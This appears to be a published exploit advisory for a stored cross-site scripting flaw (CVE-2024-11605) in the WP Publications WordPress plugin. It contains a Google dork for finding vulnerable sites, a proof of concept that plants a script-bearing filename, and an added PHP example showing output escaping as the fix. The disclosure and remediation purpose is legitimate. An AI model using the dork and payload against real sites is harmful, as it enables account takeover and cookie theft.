
# Exploit Title: WP Publications WordPress Plugin 1.2 - Stored XSS
# Google Dork: inurl:/wp-content/plugins/wp-publications/
# Date: 2025-07-15
# Exploit Author: Zeynalxan Quliyev
# Vendor Homepage: https://wordpress.org/plugins/wp-publications/
# Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip
# Version: <= 1.2
# Tested on: WordPress 6.5.3 / Linux (Apache)
# CVE: CVE-2024-11605

## Vulnerability Details

The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to a **Stored Cross-Site Scripting (XSS)** attack. The vulnerability exists because the plugin fails to escape filenames before outputting them in the HTML, allowing high-privileged users (such as admins) to inject arbitrary JavaScript code.

This vulnerability is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups).

---

## Proof of Concept (PoC)

1. SSH into the server and navigate to the plugin directory:

```bash
cd /var/www/html/wp-content/plugins/wp-publications/
```

2. Run the following command to create a malicious BibTeX file:

```bash
touch "<img src=x onerror=alert('XSS')>.bib"
```

3. Access the plugin's BibTeX browser via the following URL:

```
https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
```

4. The injected JavaScript will be executed, triggering the XSS payload:

```javascript
alert('XSS');
```

---

## Impact

* Stored XSS (JavaScript) is executed in the context of the admin panel.
* Bypasses `unfiltered_html` protection in multisite environments.
* Can be used for privilege escalation, cookie theft, or injecting malicious content.

---

## Recommendation

Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually.

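The escaping this recommendation calls for, shown as an added example that is not the plugin's own code: a hypothetical file listing rendered first with the unescaped pattern described above, then with WordPress-style output escaping applied for each HTML context. The `list_bib_files_*` functions and the stand-in `esc_html`/`esc_attr` definitions (used only so the script runs outside WordPress) are assumptions.

```php
<?php
// Added example, not code from the WP Publications plugin.
// Stand-ins for the WordPress escaping helpers so this runs outside WordPress;
// inside WordPress the real esc_html()/esc_attr() are used instead.
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

/** Unsafe pattern: the filename is written into the HTML verbatim. */
function list_bib_files_unsafe(array $files): string {
    $html = '';
    foreach ($files as $file) {
        $html .= "<a href=\"bibtexbrowser.php?bib=$file\">$file</a>\n";
    }
    return $html;
}

/** Hardened: escape once per context (URL, attribute, text node). */
function list_bib_files_safe(array $files): string {
    $html = '';
    foreach ($files as $file) {
        // rawurlencode() makes the value safe as a query parameter;
        // esc_attr() protects the attribute, esc_html() the link text.
        $href = 'bibtexbrowser.php?bib=' . rawurlencode($file);
        $html .= '<a href="' . esc_attr($href) . '">' . esc_html($file) . "</a>\n";
    }
    return $html;
}

// Constructed sample input mirroring the filename from the PoC above.
$files = ['refs.bib', "<img src=x onerror=alert('XSS')>.bib"];

echo "Unsafe:\n" . list_bib_files_unsafe($files);
// The <img> tag survives and the browser executes onerror.

echo "Safe:\n" . list_bib_files_safe($files);
// Rendered as &lt;img src=x onerror=alert(&#039;XSS&#039;)&gt;.bib: plain text, no execution.
```

Restricting accepted filenames to a basename allowlist (for example, letters, digits, `.`, `_`, `-` ending in `.bib`) is a useful second layer, but output escaping is the fix the page's recommendation describes and must be present regardless.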
---

## References

* [CVE-2024-11605 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-11605)
* [WP Plugin Page](https://wordpress.org/plugins/wp-publications/)